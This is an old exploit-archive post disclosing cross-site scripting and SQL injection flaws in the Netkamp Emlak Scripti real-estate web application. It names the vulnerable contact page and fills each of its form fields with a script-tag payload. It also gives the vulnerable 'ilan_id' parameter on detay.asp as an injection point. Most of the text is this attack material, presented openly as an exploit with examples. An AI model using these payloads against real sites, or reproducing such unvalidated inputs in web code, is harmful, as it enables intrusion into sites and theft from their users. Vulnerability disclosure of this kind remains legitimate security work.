Home / os / win2k

netkamp-sql.txt

Posted on 30 September 2007

Netkamp Emlak Scripti XSS & Sql Ýnjections Vulnerability #Software: Netkamp Emlak Scripti #download: not free(350 YTL) sale: http://www.netkamp.com/net_emlak.asp #demo: http://netemlak.netkamp.com/ #Found By: GeFORC3 ( G3 ) #Exploit & example : ----------------------------------------------------------------------- #XSS: http://www.site.com/script_path/iletisim.asp write to xss code in script's tex box expample: Ýletiþim Formu(contact form) Adýnýz: "><script>alert("G3");</script> Soyadýnýz: "><script>alert("G3");</script> E-Mail: "><script>alert("G3");</script> Konu: "><script>alert("G3");</script> Mesajýnýz: "><script>alert("G3");</script> Press to "gönder"(send) button. This xss works on "Netkamp Emlak Scripti" script's contact page ----------------------------------------------------------------------- #Sql Ýnjections http://www.site.com.com/script_path/detay.asp?ilan_id=[SQL] ----------------------------------------------------- WwW.GeFORC3.ORG | WwW.HeykirBlog.Org | WwW.NetKaBus.CoM

 

TOP